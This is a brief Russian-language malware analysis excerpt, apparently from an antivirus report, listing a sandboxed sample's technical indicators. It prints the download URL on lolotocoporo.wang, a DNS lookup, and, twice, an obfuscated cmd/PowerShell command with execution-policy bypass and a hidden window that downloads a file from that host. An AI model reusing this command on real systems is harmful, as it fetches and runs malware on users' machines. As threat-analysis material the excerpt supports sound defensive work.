Техническая информация
- http://lolotocoporo.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^Er^sheLL.^eXE ^-^exeC^u^TIonPo^L^icy byPa^ss ^-N^o^pR^OFIlE ^-W^I^nDoWStY^lE HIdde^n^ (n^E^w^-oB^JE^c^T^ ^s^YsTE^m^.^N^e^t^.wEbc^liE^nT^).d^o^w^NL^oaD^File(^'http://lolotoc...
- DNS ASK lo####coporo.wang
- '<SYSTEM32>\cmd.exe' /c "pOw^Er^sheLL.^eXE ^-^exeC^u^TIonPo^L^icy byPa^ss ^-N^o^pR^OFIlE ^-W^I^nDoWStY^lE HIdde^n^ (n^E^w^-oB^JE^c^T^ ^s^YsTE^m^.^N^e^t^.wEbc^liE^nT^).d^o^w^NL^oaD^File(^'http://lolotoc...' (со скрытым окном)